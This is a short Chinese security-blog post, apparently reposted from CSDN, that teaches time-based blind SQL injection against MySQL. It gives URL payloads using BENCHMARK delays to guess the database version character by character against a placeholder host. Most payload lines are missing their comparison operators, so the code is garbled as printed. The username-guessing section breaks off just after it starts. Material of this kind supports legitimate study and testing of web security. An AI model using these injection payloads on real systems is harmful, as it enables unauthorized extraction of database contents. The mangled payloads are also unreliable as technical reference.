【漏洞挖掘】——104、Blind注入类型深入刨析,nldd注入

【漏洞挖掘】——104、Blind注入类型深入刨析Benchmark盲注流程
猜解数据库版本名称
猜测数据库版本名称的第一个值————5. http://www.example.com/?id=1\’ and if(left(versio

Benchmark盲注流程

猜解数据库版本名称

猜测数据库版本名称的第一个值:————5。

http://www.example.com/?id=1\’ and if(left(version(),1)4,1,(select benchmark(10000000,md5(0x41)))) –+ #无延迟

http://www.example.com/?id=1\’ and if(left(version(),1)5,1,(select benchmark(10000000,md5(0x41)))) –+ #有延迟

http://www.example.com/?id=1\’ and if(left(version(),1)=5,1,(select benchmark(10000000,md5(0x41)))) –+ #无延迟

猜测数据库版本名称的第二个值————5.5

http://www.example.com/?id=1\’ and if(left(version(),3)5.4,1,(select benchmark(10000000,md5(0x41)))) –+ #无延迟

http://www.example.com/?id=1\’ and if(left(version(),3)5.5,1,(select benchmark(10000000,md5(0x41)))) –+ #有延迟

http://www.example.com/?id=1\’ and if(left(version(),3)=5.5,1,(select benchmark(10000000,md5(0x41)))) –+ #无延迟

因此,原来数据库的版本信息是5.5。

猜解数据库用户名称

首先猜测用户名的长度

#【漏洞挖掘】——104及以上相关内容来源网络对盲注入类型的详细分析,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91399.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月22日 上午5:48
下一篇 2024年6月22日 上午5:48

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注